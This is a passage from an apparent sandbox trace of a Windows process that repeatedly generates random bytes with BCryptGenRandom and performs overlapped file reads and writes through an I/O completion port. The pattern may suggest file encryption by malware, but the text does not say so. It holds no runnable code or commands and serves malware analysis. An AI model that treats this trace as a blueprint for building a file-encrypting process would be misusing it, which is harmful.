lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0168.497] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0168.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0168.510] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.510] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.510] free (_Block=0x3e305b8) [0168.510] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.510] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.510] free (_Block=0x1fa91d0) [0168.510] free (_Block=0x1fa2ed8) [0168.510] free (_Block=0x1fa90b8) [0168.510] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.511] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.515] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0168.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.524] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.525] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0168.525] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.526] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0168.526] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.526] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.526] free (_Block=0x3e305b8) [0168.526] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.526] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.527] free (_Block=0x1fa91d0) [0168.527] free (_Block=0x1fa2ed8) [0168.527] free (_Block=0x1fa90b8) [0168.527] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0168.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.612] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0168.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.615] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.758] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.049] CloseHandle (hObject=0x170) returned 1 [0169.049] free (_Block=0x1ff1e60) [0169.049] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.058] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.058] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.058] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.059] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.059] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.059] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.059] free (_Block=0x3e305b8) [0169.059] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.059] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.060] free (_Block=0x1fa91d0) [0169.060] free (_Block=0x1fa2ed8) [0169.060] free (_Block=0x1fa90b8) [0169.060] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0169.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.071] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.072] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.072] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.073] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.073] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.073] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.073] free (_Block=0x3e305b8) [0169.073] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.073] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.073] free (_Block=0x1fa91d0) [0169.073] free (_Block=0x1fa2ed8) [0169.073] free (_Block=0x1fa90b8) [0169.073] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0169.075] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.084] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.084] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.084] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.084] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.085] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.085] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.085] free (_Block=0x3e305b8) [0169.085] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.085] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.085] free (_Block=0x1fa91d0) [0169.085] free (_Block=0x1fa2ed8) [0169.085] free (_Block=0x1fa90b8) [0169.085] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0169.086] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.094] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.095] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.095] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.095] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.096] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.096] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.096] free (_Block=0x3e305b8) [0169.096] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.096] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.096] free (_Block=0x1fa91d0) [0169.096] free (_Block=0x1fa2ed8) [0169.096] free (_Block=0x1fa90b8) [0169.096] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0169.098] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.106] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.107] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.107] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.107] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.107] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.107] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.108] free (_Block=0x3e305b8) [0169.108] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.108] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.108] free (_Block=0x1fa91d0) [0169.108] free (_Block=0x1fa2ed8) [0169.108] free (_Block=0x1fa90b8) [0169.108] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0169.109] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.113] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x7c10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0169.114] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.119] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.120] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.120] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.121] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.121] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.121] free (_Block=0x3e305b8) [0169.121] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.121] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.121] free (_Block=0x1fa91d0) [0169.121] free (_Block=0x1fa2ed8) [0169.121] free (_Block=0x1fa90b8) [0169.121] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0169.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.135] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.135] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.135] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.136] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.136] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.136] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.136] free (_Block=0x3e305b8) [0169.136] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.136] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.136] free (_Block=0x1fa91d0) [0169.137] free (_Block=0x1fa2ed8) [0169.137] free (_Block=0x1fa90b8) [0169.137] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0169.137] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.138] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0169.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.426] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.427] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.427] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.428] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.428] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.428] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.428] free (_Block=0x3e305b8) [0169.428] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.428] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.429] free (_Block=0x1fa91d0) [0169.429] free (_Block=0x1fa2ed8) [0169.429] free (_Block=0x1fa90b8) [0169.429] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.432] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.444] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x84a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0169.446] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.654] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.655] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.655] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.656] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.656] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.656] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.656] free (_Block=0x3e305b8) [0169.656] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.656] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.657] free (_Block=0x1fa91d0) [0169.657] free (_Block=0x1fa2ed8) [0169.657] free (_Block=0x1fa90b8) [0169.657] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0169.658] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.695] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.695] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.695] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.696] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.696] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.696] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.696] free (_Block=0x3e305b8) [0169.696] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.696] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.697] free (_Block=0x1fa91d0) [0169.697] free (_Block=0x1fa2ed8) [0169.697] free (_Block=0x1fa90b8) [0169.697] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.698] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.712] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.712] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.713] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.716] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.716] free (_Block=0x3e305b8) [0169.716] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.716] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.717] free (_Block=0x1fa91d0) [0169.717] free (_Block=0x1fa2ed8) [0169.717] free (_Block=0x1fa90b8) [0169.717] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0169.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.741] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.745] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.745] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.746] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.746] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.746] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.746] free (_Block=0x3e305b8) [0169.746] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.746] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.747] free (_Block=0x1fa91d0) [0169.747] free (_Block=0x1fa2ed8) [0169.747] free 